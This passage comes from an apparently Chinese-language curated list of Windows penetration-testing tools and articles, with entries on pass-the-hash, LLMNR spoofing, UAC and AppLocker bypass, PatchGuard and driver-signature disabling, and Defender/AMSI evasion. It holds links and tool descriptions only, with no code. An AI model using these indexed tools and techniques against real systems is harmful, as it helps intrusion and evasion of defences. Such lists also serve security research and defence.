Desktop](https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-Pass-the-Hash-with-Remote-Desktop/) - 2018.05 [3gstudent] [渗透技巧——Pass the Hash with Remote Desktop](https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-Pass-the-Hash-with-Remote-Desktop/) - 2018.02 [4hou] [如何用WINDOWS事件查看器检测传递哈希](http://www.4hou.com/system/10273.html) - 2017.12 [3gstudent] [域渗透——Pass The Hash的实现](https://3gstudent.github.io/3gstudent.github.io/%E5%9F%9F%E6%B8%97%E9%80%8F-Pass-The-Hash%E7%9A%84%E5%AE%9E%E7%8E%B0/) - 2017.12 [3gstudent] [域渗透——Pass The Hash的实现](https://3gstudent.github.io/3gstudent.github.io/%E5%9F%9F%E6%B8%97%E9%80%8F-Pass-The-Hash%E7%9A%84%E5%AE%9E%E7%8E%B0/) - 2017.12 [aliyun] [域渗透——Pass The Hash的实现](https://xz.aliyun.com/t/1802) - 2017.08 [labofapenetrationtester] [Week of Evading Microsoft ATA - Day 2 - Overpass-the-hash and Golden Ticket](http://www.labofapenetrationtester.com/2017/08/week-of-evading-microsoft-ata-day2.html) - 2017.06 [decoder] [From Pass-the-Hash to Pass-the-Ticket with no pain](https://decoder.cloud/2017/06/30/from-pass-the-hash-to-pass-the-ticket-with-no-pain/) - 2017.06 [wikidsystems] [Defeating pass-the-hash attacks with two-factor authentication](https://www.wikidsystems.com/blog/defeating-pass-the-hash-attacks-with-two-factor-authentication/) *** ## <a id="af48434aafea8db423a9bacef64b1620"></a>Pass-The-Ticket ### <a id="e335ccf1622ee0d95b75a4cbb0af5a32"></a>文章 - 2019.02 [stealthbits] [How to Detect Pass-the-Ticket Attacks](https://blog.stealthbits.com/detect-pass-the-ticket-attacks) - 2017.05 [4hou] [如何通过SSH隧道实现 Windows Pass the Ticket攻击?](http://www.4hou.com/technology/4974.html) - 2017.05 [bluescreenofjeff] [如何利用 SSH 隧道进行域渗透(Passthe Ticket)](https://bluescreenofjeff.com/2017-05-23-how-to-pass-the-ticket-through-ssh-tunnels/) *** ## <a id="fe064b8a783e94169307579efcfc5349"></a>winglogon.exe ### <a id="1e77e9449ab3be5cd9977aa55991c897"></a>工具 ### <a id="6d3a0fcab4e6b1199600072b17f941b0"></a>文章 - 2020.01 [pentestlab] [Persistence – Winlogon Helper DLL](https://pentestlab.blog/2020/01/14/persistence-winlogon-helper-dll/) - 2019.09 [specterops] [Understanding and Defending Against Access Token Theft: Finding Alternatives to winlogon.exe](https://medium.com/p/80696c8a73b) - 2016.11 [hexacorn] [The Archaeologologogology #2 – the romantic view as seen through the winlogon.exe’s window…](http://www.hexacorn.com/blog/2016/11/27/the-archaeologologogology-2-the-romantic-view-as-seen-through-the-winlogon-exes-window/) - 2016.05 [malwarebytes] [Tech support scammers using Winlogon](https://blog.malwarebytes.com/cybercrime/2016/05/tech-support-scammers-using-winlogon/) - 2010.11 [redplait] [winlogon.exe RPC interfaces](http://redplait.blogspot.com/2010/11/winlogonexe-rpc-interfaces.html) - 2009.05 [pediy] [[推荐]汇编实现注入winlogon.exe屏蔽Ctrl+Alt+Del 附lib库 源码和例子](https://bbs.pediy.com/thread-87864.htm) *** ## <a id="9813233777717d99ef29e2fe63abfefb"></a>LLMNR ### <a id="7658d2242abc5b8c24e80a77b3a89321"></a>工具 - [**1072**星][6m] [PS] [kevin-robertson/inveigh](https://github.com/kevin-robertson/inveigh) Windows PowerShell ADIDNS/LLMNR/mDNS/NBNS spoofer/man-in-the-middle tool - [**258**星][6m] [C#] [kevin-robertson/inveighzero](https://github.com/kevin-robertson/inveighzero) Windows C# LLMNR/mDNS/NBNS/DNS spoofer/man-in-the-middle tool ### <a id="e4227d4373c3aec808349a26c979c522"></a>文章 - 2019.08 [bugbountywriteup] [LLMNR Poisoning and WPAD Spoofing](https://medium.com/p/69bfd8d8c504) - 2019.04 [blackhillsinfosec] [An SMB Relay Race – How To Exploit LLMNR and SMB Message Signing for Fun and Profit](https://www.blackhillsinfosec.com/an-smb-relay-race-how-to-exploit-llmnr-and-smb-message-signing-for-fun-and-profit/) - 2018.12 [4hou] [内网渗透技术之超越LLMNR/NBNS欺骗的ADIDNS欺骗攻击](http://www.4hou.com/penetration/15309.html) - 2018.07 [netspi] [不只是 LLMNR/NBNS 欺骗: 攻击集成了 Active Directory 的 DNS](https://blog.netspi.com/exploiting-adidns/) - 2018.06 [blackhillsinfosec] [How to Disable LLMNR & Why You Want To](https://www.blackhillsinfosec.com/how-to-disable-llmnr-why-you-want-to/) - 2018.05 [freebuf] [利用LLMNR结合PDF文件获取PC Hashes](http://www.freebuf.com/articles/network/171634.html) - 2017.11 [aliyun] [利用 LLMNR 名称解析缺陷劫持内网指定主机会话](https://xz.aliyun.com/t/1679) - 2017.04 [n0where] [Windows PowerShell LLMNR/NBNS spoofer: Inveigh](https://n0where.net/windows-powershell-llmnrnbns-spoofer-inveigh) - 2017.03 [n0where] [LLMNR NBT-NS MDNS Poisoner: Responder](https://n0where.net/llmnr-nbt-ns-mdns-poisoner-responder) - 2017.02 [360] [渗透测试中的LLMNR/NBT-NS欺骗攻击](https://www.anquanke.com/post/id/85503/) - 2017.01 [polaris] [LLMNR&WPAD介绍以及渗透测试中的利用](http://polaris-lab.com/index.php/archives/139/) - 2016.12 [pentest] [What is LLMNR & WPAD and How to Abuse Them During Pentest ?](https://pentest.blog/what-is-llmnr-wpad-and-how-to-abuse-them-during-pentest/) - 2016.11 [n0where] [LLMNR, NBT-NS and MDNS Responder for Windows](https://n0where.net/llmnr-nbt-ns-and-mdns-responder-for-windows) - 2016.06 [] [LLMNR and NBT-NS Poisoning Using Responder](https://www.4armed.com/blog/llmnr-nbtns-poisoning-using-responder/) - 2016.03 [360] [Inveigh:Windows Powershell版的LLMNR/NBNS 协议欺骗/中间人工具](https://www.anquanke.com/post/id/83671/) - 2016.02 [securityblog] [LLMNR NBT-NS and MDNS poisoner](http://securityblog.gr/3249/llmnr-nbt-ns-and-mdns-poisoner/) - 2015.12 [toolswatch] [Inveigh Beta Windows PowerShell LLMNR/NBNS Spoofer](http://www.toolswatch.org/2015/12/inveigh-beta-windows-powershell-llmnrnbns-spoofer/) - 2015.09 [gracefulsecurity] [Stealing Accounts: LLMNR and NBT-NS Spoofing](https://www.gracefulsecurity.com/stealing-accounts-llmnr-and-nbt-ns-poisoning/) *** ## <a id="d6fd46f65ce1fe687a92a2da9551d7a9"></a>NetBIOS ### <a id="e41f70bc9d7ba0f1430bed63e2d9aece"></a>工具 ### <a id="ce06393f8c683c74ea341a9ef2b48938"></a>文章 - 2019.01 [infosecaddicts] [Enumerating NetBIOS services](https://infosecaddicts.com/enumerating-netbios-services/) - 2018.10 [HackerSploit] [NetBIOS And SMB Enumeration - Nbtstat & smbclient](https://www.youtube.com/watch?v=sXqT95eIAjo) - 2017.09 [hackingarticles] [NetBIOS and SMB Penetration Testing on Windows](http://www.hackingarticles.in/netbios-and-smb-penetration-testing-on-windows/) - 2016.09 [rapid7] [Sonar NetBIOS Name Service Study](https://blog.rapid7.com/2016/09/06/sonar-netbios-name-service-study/) - 2015.10 [akamai] [NetBIOS, RPC Portmap and Sentinel Reflection DDoS Attacks](https://blogs.akamai.com/2015/10/netbios-rpc-portmap-and-sentinel-reflection-ddos-attacks.html) - 2015.09 [darknet] [Remote Network Penetration via NetBios Hack/Hacking](https://www.darknet.org.uk/2006/09/remote-network-penetration-via-netbios-hackhacking/) - 2015.08 [agrrrdog] [NetBIOS spoofing for attacks on browser](http://agrrrdog.blogspot.com/2015/08/netbios-spoofing-for-attacks-on-browser.html) - 2014.08 [sans] [All Samba 4.x.x are vulnerable to a remote code execution vulnerability in the nmbd NetBIOS name services daemon](https://isc.sans.edu/forums/diary/All+Samba+4xx+are+vulnerable+to+a+remote+code+execution+vulnerability+in+the+nmbd+NetBIOS+name+services+daemon/18471/) - 2013.04 [securityblog] [Disable NetBIOS NULL Sessions](http://securityblog.gr/1841/disable-netbios-null-sessions/) - 2012.08 [pentestlab] [Scanning NetBIOS](https://pentestlab.blog/2012/08/19/scanning-netbios/) - 2012.08 [freebuf] [使用NetBios Spoofing技术渗透内网](http://www.freebuf.com/articles/5238.html) - 2012.05 [sans] [Windows Firewall Bypass Vulnerability and NetBIOS NS](https://isc.sans.edu/forums/diary/Windows+Firewall+Bypass+Vulnerability+and+NetBIOS+NS/13156/) - 2012.04 [securityblog] [NetBIOS name enumeration](http://securityblog.gr/656/netbios-name-enumeration/) - 2012.01 [sans] [Is it time to get rid of NetBIOS?](https://isc.sans.edu/forums/diary/Is+it+time+to+get+rid+of+NetBIOS/12454/) - 2011.02 [toolswatch] [Netbios Share Scanner updated to v0.3](http://www.toolswatch.org/2011/02/netbios-share-scanner-updated-to-v0-3/) - 2011.01 [toolswatch] [Netbios Share Scanner v0.2 released](http://www.toolswatch.org/2011/01/netbios-share-scanner-v0-2-released/) - 2008.08 [skullsecurity] [nbtool 0.02 released! (also, a primer on NetBIOS)](https://blog.skullsecurity.org/2008/nbtool-002-released-also-a-primer-on-netbios) *** ## <a id="cd40abc5c7d4b2907b770e53a60ee3ec"></a>其他 ### <a id="e522f8282206b84cd670cbb658e4bd75"></a>工具 # <a id="cbdc1e0b908c8f2df368db8bbc65926f"></a>安全防护 *** ## <a id="40fd1488e4a26ebf908f44fdcedd9675"></a>UAC ### <a id="02517eda8c2519c564a19219e97d6237"></a>工具 - [**2500**星][2m] [C] [hfiref0x/uacme](https://github.com/hfiref0x/uacme) Defeating Windows User Account Control - [**2458**星][9d] [PS] [k8gege/k8tools](https://github.com/k8gege/k8tools) K8工具合集(内网渗透/提权工具/远程溢出/漏洞利用/扫描工具/密码破解/免杀工具/Exploit/APT/0day/Shellcode/Payload/priviledge/BypassUAC/OverFlow/WebShell/PenTest) Web GetShell Exploit(Struts2/Zimbra/Weblogic/Tomcat/Apache/Jboss/DotNetNuke/zabbix) - [**1859**星][17d] [JS] [coreybutler/node-windows](https://github.com/coreybutler/node-windows) Windows support for Node.JS scripts (daemons, eventlog, UAC, etc). - [**1742**星][1m] [Py] [rootm0s/winpwnage](https://github.com/rootm0s/winpwnage) UAC bypass, Elevate, Persistence and Execution methods ### <a id="90d7d5feb7fd506dc8fd6ee0d7e98285"></a>文章 - 2020.01 [morphisec] [Trickbot Trojan Leveraging a New Windows 10 UAC Bypass](https://blog.morphisec.com/trickbot-uses-a-new-windows-10-uac-bypass) - 2019.11 [4hou] [CVE-2019-1388: Windows UAC权限提升漏洞](https://www.4hou.com/info/news/21710.html) - 2019.10 [freebuf] [UAC绕过初探](https://www.freebuf.com/articles/system/216337.html) - 2019.09 [4sysops] [Security options in Windows Server 2016: Accounts and UAC](https://4sysops.com/archives/security-options-in-windows-server-2016-accounts-and-uac/) - 2019.09 [heynowyouseeme] [windows 10 GUI UAC bypass ( netplwiz.exe )](https://heynowyouseeme.blogspot.com/2019/09/windows-10-gui-uac-bypass-netplwizexe.html) - 2019.08 [heynowyouseeme] [Windows 10 LPE (UAC Bypass) in Windows Store (WSReset.exe)](https://heynowyouseeme.blogspot.com/2019/08/windows-10-lpe-uac-bypass-in-windows.html) - 2019.08 [freebuf] [SneakyEXE:一款嵌入式UAC绕过工具](https://www.freebuf.com/sectool/209097.html) - 2019.04 [markmotig] [Brute Forcing Admin Passwords with UAC](https://medium.com/p/e711c551ad7e) - 2019.03 [4hou] [通过模拟可信目录绕过UAC的利用分析](https://www.4hou.com/technology/16713.html) - 2019.03 [aliyun] [如何滥用Access Tokens UIAccess绕过UAC](https://xz.aliyun.com/t/4126) - 2019.02 [3gstudent] [通过模拟可信目录绕过UAC的利用分析](https://3gstudent.github.io/3gstudent.github.io/%E9%80%9A%E8%BF%87%E6%A8%A1%E6%8B%9F%E5%8F%AF%E4%BF%A1%E7%9B%AE%E5%BD%95%E7%BB%95%E8%BF%87UAC%E7%9A%84%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90/) - 2019.02 [3gstudent] [通过模拟可信目录绕过UAC的利用分析](https://3gstudent.github.io/3gstudent.github.io/%E9%80%9A%E8%BF%87%E6%A8%A1%E6%8B%9F%E5%8F%AF%E4%BF%A1%E7%9B%AE%E5%BD%95%E7%BB%95%E8%BF%87UAC%E7%9A%84%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90/) - 2019.02 [sans] [UAC is not all that bad really](https://isc.sans.edu/forums/diary/UAC+is+not+all+that+bad+really/24620/) - 2019.01 [fuzzysecurity] [Anatomy of UAC Attacks](http://fuzzysecurity.com/tutorials/27.html) - 2019.01 [sevagas] [Yet another sdclt UAC bypass](https://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass) - 2018.11 [4hou] [利用metasploit绕过UAC的5种方式](http://www.4hou.com/system/13707.html) - 2018.11 [tenable] [UAC Bypass by Mocking Trusted Directories](https://medium.com/p/24a96675f6e) - 2018.10 [0x000x00] [How to bypass UAC in newer Windows versions](https://0x00-0x00.github.io/research/2018/10/31/How-to-bypass-UAC-in-newer-Windows-versions.html) - 2018.10 [tyranidslair] [Farewell to the Token Stealing UAC Bypass](https://tyranidslair.blogspot.com/2018/10/farewell-to-token-stealing-uac-bypass.html) - 2018.10 [tyranidslair] [Farewell to the Token Stealing UAC Bypass](https://www.tiraniddo.dev/2018/10/farewell-to-token-stealing-uac-bypass.html) *** ## <a id="184bbacd8b9e08c30cc9ffcee9513f44"></a>AppLocker ### <a id="8f1876dff78e80b60d00de25994276d9"></a>工具 - [**947**星][23d] [PS] [api0cradle/ultimateapplockerbypasslist](https://github.com/api0cradle/ultimateapplockerbypasslist) The goal of this repository is to document the most common techniques to bypass AppLocker. ### <a id="286317d6d7c1a0578d8f5db940201320"></a>文章 - 2019.11 [tyranidslair] [The Internals of AppLocker - Part 4 - Blocking DLL Loading](https://tyranidslair.blogspot.com/2019/11/the-internals-of-applocker-part-4.html) - 2019.11 [tyranidslair] [The Internals of AppLocker - Part 4 - Blocking DLL Loading](https://www.tiraniddo.dev/2019/11/the-internals-of-applocker-part-4.html) - 2019.11 [tyranidslair] [The Internals of AppLocker - Part 3 - Access Tokens and Access Checking](https://tyranidslair.blogspot.com/2019/11/the-internals-of-applocker-part-3.html) - 2019.11 [tyranidslair] [The Internals of AppLocker - Part 3 - Access Tokens and Access Checking](https://www.tiraniddo.dev/2019/11/the-internals-of-applocker-part-3.html) - 2019.11 [tyranidslair] [The Internals of AppLocker - Part 2 - Blocking Process Creation](https://tyranidslair.blogspot.com/2019/11/the-internals-of-applocker-part-2.html) - 2019.11 [tyranidslair] [The Internals of AppLocker - Part 2 - Blocking Process Creation](https://www.tiraniddo.dev/2019/11/the-internals-of-applocker-part-2.html) - 2019.11 [tyranidslair] [The Internals of AppLocker - Part 1 - Overview and Setup](https://tyranidslair.blogspot.com/2019/11/the-internals-of-applocker-part-1.html) - 2019.11 [tyranidslair] [The Internals of AppLocker - Part 1 - Overview and Setup](https://www.tiraniddo.dev/2019/11/the-internals-of-applocker-part-1.html) - 2019.09 [blackhillsinfosec] [Getting Started With AppLocker](https://www.blackhillsinfosec.com/getting-started-with-applocker/) - 2019.08 [p0w3rsh3ll] [How to delete a single Applocker rule](https://p0w3rsh3ll.wordpress.com/2019/08/02/how-to-delete-a-single-applocker-rule/) - 2019.05 [oddvar] [A small discovery about AppLocker](https://oddvar.moe/2019/05/29/a-small-discovery-about-applocker/) - 2019.04 [4hou] [通过regsrv32.exe绕过Applocker应用程序白名单的多种方法](https://www.4hou.com/web/17354.html) - 2019.03 [4sysops] [Application whitelisting: Software Restriction Policies vs. AppLocker vs. Windows Defender Application Control](https://4sysops.com/archives/application-whitelisting-software-restriction-policies-vs-applocker-vs-windows-defender-application-control/) - 2019.03 [4hou] [逃避手段再开花——从一个能逃避AppLocker和AMSI检测的Office文档讲起](https://www.4hou.com/system/16916.html) - 2019.03 [yoroi] [The Document that Eluded AppLocker and AMSI](https://blog.yoroi.company/research/the-document-that-eluded-applocker-and-amsi/) - 2019.03 [p0w3rsh3ll] [Applocker and PowerShell: how do they tightly work together?](https://p0w3rsh3ll.wordpress.com/2019/03/07/applocker-and-powershell-how-do-they-tightly-work-together/) - 2019.02 [4hou] [如何以管理员身份绕过AppLocker](http://www.4hou.com/web/16213.html) - 2019.02 [oddvar] [Bypassing AppLocker as an admin](https://oddvar.moe/2019/02/01/bypassing-applocker-as-an-admin/) - 2019.01 [hackingarticles] [Windows Applocker Policy – A Beginner’s Guide](https://www.hackingarticles.in/windows-applocker-policy-a-beginners-guide/) - 2019.01 [t00ls] [投稿文章:Bypass Applocker + 免杀执行任意 shellcode [ csc + installUtil ]](https://www.t00ls.net/articles-49443.html) *** ## <a id="fa89526db1f9373c57ea4ffa1ac8c39f"></a>Data Execution Prevention(DEP) ### <a id="10252fd90a09cb32b4e82497aa79f037"></a>工具 ### <a id="5ff9992a2474eb75e2a1b5860d5b87dc"></a>文章 - 2019.11 [aliyun] [ARM EXP 开发 - 绕过 DEP 执行 mprotect()](https://xz.aliyun.com/t/6750) - 2019.07 [codingvision] [Bypassing ASLR and DEP - Getting Shells with pwntools](https://codingvision.net/security/bypassing-aslr-dep-getting-shells-with-pwntools) - 2019.01 [fuzzysecurity] [MS13-009 Use-After-Free IE8 (DEP)](http://fuzzysecurity.com/exploits/20.html) - 2019.01 [fuzzysecurity] [BlazeVideo HDTV Player 6.6 Professional SEH&DEP&ASLR](http://fuzzysecurity.com/exploits/11.html) - 2019.01 [fuzzysecurity] [NCMedia Sound Editor Pro v7.5.1 SEH&DEP&ASLR](http://fuzzysecurity.com/exploits/16.html) - 2019.01 [fuzzysecurity] [ALLMediaServer 0.8 SEH&DEP&ASLR](http://fuzzysecurity.com/exploits/15.html) - 2018.12 [360] [CoolPlayer bypass DEP(CVE-2008-3408)分析](https://www.anquanke.com/post/id/167424/) - 2018.09 [duo] [Weak Apple DEP Authentication Leaves Enterprises Vulnerable to Social Engineering Attacks and Rogue Devices](https://duo.com/blog/weak-apple-dep-authentication-leaves-enterprises-vulnerable-to-social-engineering-attacks-and-rogue-devices) - 2018.09 [3or] [ARM Exploitation - Defeating DEP - executing mprotect()](https://blog.3or.de/arm-exploitation-defeating-dep-executing-mprotect.html) - 2018.09 [3or] [ARM Exploitation - Defeating DEP - execute system()](https://blog.3or.de/arm-exploitation-defeating-dep-execute-system.html) - 2018.06 [pediy] [[原创]Easy MPEG to DVD Burner 1.7.11 SEH + DEP Bypass Local Buffer Overflow](https://bbs.pediy.com/thread-228537.htm) - 2018.05 [pediy] [[翻译]DEP缓解技术(一)](https://bbs.pediy.com/thread-226625.htm) - 2017.12 [360] [利用缓解技术:数据执行保护(DEP)](https://www.anquanke.com/post/id/91266/) - 2017.12 [0x00sec] [Exploit Mitigation Techniques - Data Execution Prevention (DEP)](https://0x00sec.org/t/exploit-mitigation-techniques-data-execution-prevention-dep/4634/) - 2017.10 [freebuf] [在64位系统中使用ROP+Return-to-dl-resolve来绕过ASLR+DEP](http://www.freebuf.com/articles/system/149364.html) - 2017.10 [freebuf] [如何在32位系统中使用ROP+Return-to-dl来绕过ASLR+DEP](http://www.freebuf.com/articles/system/149214.html) - 2017.08 [pediy] [[原创]利用Ret2Libc挑战DEP——利用ZwSetInformationProcess](https://bbs.pediy.com/thread-220346.htm) - 2017.06 [360] [ropasaurusrex:ROP入门教程——DEP(下)](https://www.anquanke.com/post/id/86197/) - 2017.06 [360] [ropasaurusrex:ROP入门教程——DEP(上)](https://www.anquanke.com/post/id/86196/) - 2017.05 [myonlinesecurity] [fake clothing order Berhanu (PURCHASE DEPARTMENT) using winace files delivers Loki bot](https://myonlinesecurity.co.uk/fake-clothing-order-berhanu-purchase-department-using-winace-files-delivers-loki-bot/) *** ## <a id="edd6035c85e4ddf47939cc0e21505089"></a>Patch Guard(PG) ### <a id="928f69b989fa9e8ec3436e361f646eac"></a>工具 - [**551**星][11m] [C] [hfiref0x/upgdsed](https://github.com/hfiref0x/upgdsed) 通用PG和DSE禁用工具 ### <a id="998ed9d8013051b3c7b21b89d189d509"></a>文章 - 2019.04 [OffensiveCon] [OffensiveCon19 - Luc Reginato - Updated Analysis of PatchGuard on Windows RS4](https://www.youtube.com/watch?v=ifWdeFHXj7s) - 2019.03 [tetrane] [Updated Analysis of PatchGuard on Microsoft Windows 10 RS4](https://blog.tetrane.com/2019/Analysis-Windows-PatchGuard.html) - 2018.10 [aliyun] [搞定PatchGuard:利用KPTI绕过内核修改保护](https://xz.aliyun.com/t/3072) - 2018.10 [ensilo] [Melting Down PatchGuard: Leveraging KPTI to Bypass Kernel Patch Protection](https://blog.ensilo.com/meltdown-patchguard) - 2018.09 [pediy] [[原创]PatchGuard自效验粗略分析](https://bbs.pediy.com/thread-246730.htm) - 2015.06 [alex] [What are Little PatchGuards Made Of?](http://www.alex-ionescu.com/?p=290) - 2015.01 [ptsecurity] [Windows 8.1 Kernel Patch Protection — PatchGuard](http://blog.ptsecurity.ru/2015/01/windows-81-kernel-patch-protection.html) - 2014.07 [mcafee] [Malicious Utility Can Defeat Windows PatchGuard](https://www.mcafee.com/blogs/other-blogs/mcafee-labs/malicious-utility-can-defeat-windows-patchguard/) - 2014.07 [mcafee] [Malicious Utility Can Defeat Windows PatchGuard](https://securingtomorrow.mcafee.com/mcafee-labs/malicious-utility-can-defeat-windows-patchguard/) - 2014.03 [mcafee] [Analyzing the Uroburos PatchGuard Bypass](https://www.mcafee.com/blogs/other-blogs/mcafee-labs/analyzing-uroburos-patchguard-bypass/) - 2014.03 [mcafee] [Analyzing the Uroburos PatchGuard Bypass](https://securingtomorrow.mcafee.com/mcafee-labs/analyzing-uroburos-patchguard-bypass/) - 2013.02 [pediy] [[原创]DisablePatchGuard.sys](https://bbs.pediy.com/thread-162477.htm) - 2012.11 [pediy] [[讨论]让PatchGuard变狗屎的那些方法~](https://bbs.pediy.com/thread-158157.htm) - 2011.06 [picturoku] [Patchguard red flags](http://picturoku.blogspot.com/2011/06/patchguard-red-flags.html) - 2009.12 [immunityinc] [PatchGuard](https://www.immunityinc.com/downloads/h2hc.pdf) - 2007.01 [alex] [Windows Vista 64-bit Driver Signing/PatchGuard Workaround](http://www.alex-ionescu.com/?p=23) - 2007.01 [pediy] [[转帖]Bypassing PatchGuard on Windows x64](https://bbs.pediy.com/thread-37428.htm) - 2006.10 [microsoft] [The Final Word – Jim Allchin Letter Clarifies Patchguard on Vista](https://cloudblogs.microsoft.com/microsoftsecure/2006/10/24/the-final-word-jim-allchin-letter-clarifies-patchguard-on-vista/) - 2006.10 [infosecblog] [MS caves on Vista Patchguard? Not so fast](https://www.infosecblog.org/2006/10/ms-caves-on-vista-patchguard-not-so-fast/) - 2006.08 [microsoft] [Interview with Patchguard Architect Forrest Foltz (Windows Vista x64 Security – Patchguard follow up)](https://cloudblogs.microsoft.com/microsoftsecure/2006/08/16/interview-with-patchguard-architect-forrest-foltz-windows-vista-x64-security-patchguard-follow-up/) *** ## <a id="9820fc65cd69d9d295a81cfd90be12fe"></a>Driver Signature Enforcement(DSE) ### <a id="18cbac58652453abbe2ff1aed187d370"></a>工具 - [**723**星][10m] [C] [hfiref0x/tdl](https://github.com/hfiref0x/tdl) Driver loader for bypassing Windows x64 Driver Signature Enforcement - [**369**星][11d] [C] [mattiwatti/efiguard](https://github.com/mattiwatti/efiguard) Disable PatchGuard and DSE at boot time - [**322**星][5m] [C] [9176324/shark](https://github.com/9176324/shark) Turn off PatchGuard in real time for win7 (7600) ~ win10 (18950). - [**274**星][9d] [C++] [can1357/byepg](https://github.com/can1357/byepg) Defeating Patchguard universally for Windows 8, Windows 8.1 and all versions of Windows 10 regardless of HVCI ### <a id="b2d4a9c239c773d20bd4363a4a4c5d83"></a>文章 - 2014.05 [pediy] [[分享]抄抄改改过win7,win8,win8.1 x64的强制签名(DSE)](https://bbs.pediy.com/thread-187699.htm) - 2013.01 [colinpoflynn] [Windows 7 64-bit Disable Driver Signature Enforcement](https://www.youtube.com/watch?v=k4RwaI4mn6Y) - 2012.12 [vexillium] [Defeating Windows Driver Signature Enforcement #3: The Ultimate Encounter](http://j00ru.vexillium.org/?p=1455) - 2012.12 [vexillium] [Defeating Windows Driver Signature Enforcement #3: The Ultimate Encounter](https://j00ru.vexillium.org/2012/12/defeating-windows-driver-signature-enforcement-part-3-the-ultimate-encounter/) - 2012.11 [vexillium] [Defeating Windows Driver Signature Enforcement #2: CSRSS and thread desktops](http://j00ru.vexillium.org/?p=1393) - 2012.11 [vexillium] [Defeating Windows Driver Signature Enforcement #2: CSRSS and thread desktops](https://j00ru.vexillium.org/2012/11/defeating-windows-driver-signature-enforcement-part-2-csrss-and-thread-desktops/) - 2012.11 [vexillium] [Defeating Windows Driver Signature Enforcement #1: default drivers](http://j00ru.vexillium.org/?p=1169) - 2012.11 [vexillium] [Defeating Windows Driver Signature Enforcement #1: default drivers](https://j00ru.vexillium.org/2012/11/defeating-windows-driver-signature-enforcement-part-1-default-drivers/) - 2010.06 [vexillium] [A quick insight into the Driver Signature Enforcement](http://j00ru.vexillium.org/?p=377) - 2010.06 [vexillium] [A quick insight into the Driver Signature Enforcement](https://j00ru.vexillium.org/2010/06/insight-into-the-driver-signature-enforcement/) - 2006.03 [] [Showdown: MIIS vs. DSE](http://360tek.blogspot.com/2006/03/showdown-miis-vs-dse.html) *** ## <a id="000972b0f2afd58a699bdceabfc21249"></a>Windows Defender ### <a id="3296552ba5a3a76e4e1b1c0e1164adde"></a>工具 - [**424**星][10d] [C#] [matterpreter/defendercheck](https://github.com/matterpreter/defendercheck) Identifies the bytes that Microsoft Defender flags on. ### <a id="a61cee92890da1a569289b5c1daafb6e"></a>文章 - 2020.02 [eforensicsmag] [[CQLabs] Windows Defender Exploit Guard under the hood |by Artur Wojtkowski](https://eforensicsmag.com/cqlabs-windows-defender-exploit-guard-under-the-hood-by-artur-wojtkowski/) - 2019.12 [p0w3rsh3ll] [Quick post: Review Windows Defender notifications](https://p0w3rsh3ll.wordpress.com/2019/12/29/quick-post-review-windows-defender-notifications/) - 2019.12 [4hou] [评估一个新的安全数据源的有效性: Windows Defender 漏洞利用防护(上)](https://www.4hou.com/system/22277.html) - 2019.12 [Enderman] [Can Windows Defender protect your computer against malware?](https://www.youtube.com/watch?v=ErxcY9wjr14) - 2019.12 [illuminati] [Starlink: “Sorry this application cannot run in a Virtual Machine” while running with Windows Defender Application Guard enabled.](https://illuminati.services/2019/12/07/starlink-sorry-this-application-cannot-run-under-a-virtual-machine/) - 2019.11 [vishal] [Disable Defender in Win10](https://medium.com/p/cf9514711fdf) - 2019.10 [palantir] [Assessing the effectiveness of a new security data source: Windows Defender Exploit Guard](https://medium.com/p/860b69db2ad2) - 2019.10 [HackersOnBoard] [Windows Offender Reverse Engineering Windows Defender's Antivirus Emulator](https://www.youtube.com/watch?v=LvW68czaEGs) - 2019.09 [ATTTechChannel] [9/13/19 GootKit Malware Bypasses Windows Defender | AT&T ThreatTraq](https://www.youtube.com/watch?v=gCvSxzF4x1M) - 2019.09 [aliyun] [Playing with Windows Defender](https://xz.aliyun.com/t/6216) - 2019.07 [microsoft] [How Windows Defender Antivirus integrates hardware-based system integrity for informed, extensive endpoint protection](https://www.microsoft.com/security/blog/2019/07/31/how-windows-defender-antivirus-integrates-hardware-based-system-integrity-for-informed-extensive-endpoint-protection/) - 2019.06 [goet] [Analyzing your Microsoft Defender ATP data in real-time in ELK using the new streaming API](https://medium.com/p/c435d2943605) - 2019.06 [goet] [Protect yourself against #BlueKeep using Azure Sentinel and Defender ATP.](https://medium.com/p/d308f566d5cf) - 2019.05 [eli] [Using PowerShell in Windows Defender](https://www.peerlyst.com/posts/using-powershell-in-windows-defender-eli-shlomo) - 2019.05 [morphisec] [Morphisec + WINDOWS Defender AV: Advanced Threat Protection Made Easy](https://blog.morphisec.com/morphisec-microsoft-defender-av) - 2019.04 [contextis] [Windows Defender Functionality](https://www.contextis.com/en/blog/windows-defender-functionality) - 2019.04 [rce4fun] [Circumventing Windows Defender ATP's user-mode APC Injection sensor from Kernel-mode](http://rce4fun.blogspot.com/2019/04/circumventing-windows-defender-atps.html) - 2019.03 [freebuf] [良心开发者,微软安全防护套件Windows Defender ATP将登陆Mac OS平台](https://www.freebuf.com/news/199117.html) - 2019.03 [4hou] [攻击者如何使用修改后的Empire绕过Windows Defender](https://www.4hou.com/system/16541.html) - 2019.03 [freebuf] [修改Empire绕过Windows Defender](https://www.freebuf.com/articles/system/197558.html) *** ## <a id="04b9831a450074392140722cd14df668"></a>Antimalware Scan Interface(AMSI) ### <a id="93e309abead4f559486dc29f539869de"></a>工具 - [**322**星][9d] [C#] [hackplayers/salsa-tools](https://github.com/hackplayers/salsa-tools) Salsa Tools - ShellReverse TCP/UDP/ICMP/DNS/SSL/BINDTCP/Shellcode/SILENTTRINITY and AV bypass, AMSI patched ### <a id="15a5d4f48f2cd80986bd504c561d4a89"></a>文章 - 2020.01 [ionize] [Detecting AMSI Bypass](https://ionize.com.au/detecting-amsi-bypass/) - 2019.11 [two06] [AMSI as a Service — Automating AV Evasion](https://medium.com/p/2e2f54397ff9) - 2019.11 [thecyberbutler] [Yet another update to bypass AMSI in VBA](https://medium.com/p/19ddf9065c04) - 2019.11 [freebuf] [如何识别并分析反恶意软件扫描接口(AMSI)组件](https://www.freebuf.com/articles/terminal/216921.html) - 2019.10 [binarydefense] [Binary Defense MDR Integrates Microsoft Antimalware Scan Interface Interoperability (AMSI) - Binary Defense](https://www.binarydefense.com/binary-defense-mdr-integrates-microsoft-antimalware-scan-interface-interoperability-amsi/) - 2019.10 [mattifestation] [Antimalware Scan Interface Detection Optics Analysis Methodology: Identification and Analysis of AMSI for 